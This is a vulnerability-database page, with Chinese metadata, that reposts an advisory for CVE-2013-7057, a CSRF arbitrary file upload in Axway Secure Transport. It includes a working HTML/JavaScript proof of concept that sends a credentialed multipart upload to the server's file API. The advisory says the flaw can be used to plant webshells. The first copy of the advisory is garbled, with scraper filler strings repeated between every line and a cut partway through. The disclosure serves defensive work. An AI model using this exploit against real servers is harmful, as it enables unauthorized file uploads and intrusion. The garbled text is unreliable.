Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF

30   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1332
CVE编号: CVE-2013-7057
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-11-05
CVSS
CVSS值: 6.8/10
严重级别: 中危
利用范围: Remote
攻击复杂度: Medium
认证级别: No required
漏洞描述

WLB-2014110021[***]http://cxsecurity.com/issue/WLB-2014110021[***]Bug: Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF ( Ascii Version )[***]Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF[***]2014.11.05[***]Emmanuel Law [***]Medium[***]N/A [***]CVE-2013-7057@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]No[***]Yes[***]6.8/10[***]6.4/10[***]8.6/10[***]Remote[***]No required[***]Partial[***]Partial[***]Partial[***] <!--@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit Title: Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit author: Emmanuel Law @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Public Disclosure Date : 20/10/14@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Vendor homepage: http://www.axway.com@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Affected Software version: Axway Secure Transport 5.2.1 SP2 and possibly earlier versions.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # CVE: CVE-2013-7057@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Software Description:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** =====================@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Axway SecureTransport is a multi-protocol Managed File Transfer (MFT) gateway solution that enables organizations to@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** secure, manage, and track the transfer of files inside and outside the enterprise firewall.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vulnerability Description:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** =====================@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** It is possible to conduct CSRF on a user to upload arbitary files on the Axway Secure Transport server. This is due to@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** the lack of anti-CSRF tokens in the web API. An adversary may exploit this to upload webshells for further attacks.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vulnerability Disclosure Timeline:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ==================================@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 12/12/13 - Discovered vulnerability and notified Vendor@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 17/10/14 - Verified with Vendor that a patch has been released.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 20/10/14 - Public disclosure@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Steps to reproduce / PoC:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** =========================@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** -->@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <html>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <!-- CSRF PoC to upload file to sftp.example.org- -->@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <body>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** <script>@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** function submitRequest()@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** {@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** var xhr = new XMLHttpRequest();@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** xhr.open("POST", "https://sftp.example.org/api/v1.0/files/", true);@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** xhr.setRequestHeader("Accept",@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** "text/htm

POC

<!-- # Exploit Title: Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF # Exploit author: Emmanuel Law # Public Disclosure Date : 20/10/14 # Vendor homepage: http://www.axway.com # Affected Software version: Axway Secure Transport 5.2.1 SP2 and possibly earlier versions. # CVE: CVE-2013-7057 Software Description: ===================== Axway SecureTransport is a multi-protocol Managed File Transfer (MFT) gateway solution that enables organizations to secure, manage, and track the transfer of files inside and outside the enterprise firewall. Vulnerability Description: ===================== It is possible to conduct CSRF on a user to upload arbitary files on the Axway Secure Transport server. This is due to the lack of anti-CSRF tokens in the web API. An adversary may exploit this to upload webshells for further attacks. Vulnerability Disclosure Timeline: ================================== 12/12/13 - Discovered vulnerability and notified Vendor 17/10/14 - Verified with Vendor that a patch has been released. 20/10/14 - Public disclosure Steps to reproduce / PoC: ========================= --> <html> <!-- CSRF PoC to upload file to sftp.example.org- --> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://sftp.example.org/api/v1.0/files/", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19278872527677784281970288330"); xhr.withCredentials = true; var body = "-----------------------------19278872527677784281970288330\r\n" + "Content-Disposition: form-data; name=\"upload[]\"; filename=\"AURA_TEST.randomExtension\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "FILEDATA\r\n" + "-----------------------------19278872527677784281970288330--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>